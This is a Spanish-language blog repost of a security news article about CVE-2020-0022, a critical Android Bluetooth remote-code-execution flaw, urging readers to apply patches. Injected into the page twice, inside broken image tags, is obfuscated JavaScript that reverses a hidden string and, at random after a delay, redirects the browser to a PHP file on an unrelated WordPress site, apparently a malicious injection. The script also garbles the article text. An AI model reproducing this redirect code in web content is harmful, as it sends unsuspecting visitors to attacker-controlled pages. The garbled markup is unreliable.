Una vulnerabilidad crítica en Bluetooth permite el control total en Android
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tooth-android-650×340.jpg” width=”650″ height=”340″ />Vulnerabilidad en el Blue<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tooth en Android
En ocasiones pueden surgir vulnerabilidades que ponen en riesgo la seguridad de nuestros dispositivos. Esto puede ocurrir sin importar el sistema operativo o plataforma que estemos usando. Normalmente esos fallos son corregidos por los propios fabricantes, por lo que es importante mantener siempre actualizados los equipos. En este artículo nos hacemos eco de una vulnerabilidad crítica que afecta al Bluetooth en dispositivos con Android. Vamos a explicar en qué consiste.
Una vulnerabilidad en Bluetooth afecta a dispositivos Android
Android es hoy en día el sistema operativo más utilizado en dispositivos móviles. Cuenta con millones de usuarios en todo el mundo y eso también hace que sea objetivo claro por parte de los piratas informáticos. A fin de cuenta atacan aquello que cuenta con más usuarios y, en definitiva, más opciones de tener éxito.
Esta vulnerabilidad que ha sido descubierta en el sistema Bluetooth de Android permite a un posible atacante ejecutar código arbitrario de forma remota. Esto puede hacerlo de forma silenciosa y tomar un control total del dispositivo. Un problema que, como vemos, es bastante importante.
Hay que mencionar que esta vulnerabilidad afecta a la versión Android Oreo 8.0 y a Android Pie 9.0. También hay que saber que los atacantes no necesitan ningún tipo de interacción para poder explotar esta vulnerabilidad. No afecta a la versión de Android 10, aunque sí puede generar problemas en el Bluetooth.
Eso sí, los investigadores de seguridad no descartan que también puedan ser afectadas otras versiones más antiguas, pero no han evaluado el impacto.
Un pirata informático no tendría demasiadas dificultades para conocer la dirección MAC del Bluetooth de los dispositivos, ya que incluso a través de la MAC del Wi-Fi se podría deducir.
Problema con el Bluetooth en Android
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tooth-android.jpg” width=”1000″ height=”480″ /></p>
<p>Vulnerabilidad parcheada</p>
<p>Como suele ocurrir normalmente, los propios fabricantes lanzan parches y actualizaciones de seguridad para corregir errores como el que mencionamos. En este caso esta vulnerabilidad que afecta al sistema Blue<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tooth en Android ha sido registrada como CVE-2020-0022. Ya hay parche de seguridad para corregir este problema.
Android recuerda la gravedad de esta vulnerabilidad e indican que un posible atacante de forma remota podría ejecutar código arbitrario y obtener así privilegios. Por ello es tremendamente aconsejable instalar las últimas actualizaciones disponibles para Android. Solo así podremos evitar ser víctimas de este problema que pone en juego el buen funcionamiento de nuestro dispositivo y también nuestra propia privacidad.
En caso de ser explotada con éxito esta vulnerabilidad podría permitir el robo de datos personales e incluso podría utilizarse para propagar malware en el dispositivo. Podrían llegar a espiarnos de forma remota.
Desde RedesZone recomendamos mantener siempre los sistemas y dispositivos correctamente actualizados. Como vemos en ocasiones pueden surgir vulnerabilidades y fallos de seguridad que son utilizados por los piratas informáticos para llevar a cabo sus ataques. Es esencial que instalemos siempre todos los parches que haya disponibles. De esta forma podremos evitar que puedan atacarnos y comprometer no solo el buen funcionamiento de esos equipos, sino también nuestra seguridad y privacidad. Esto es algo que debemos aplicar sin importar el tipo de software o equipo que estemos utilizando.
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.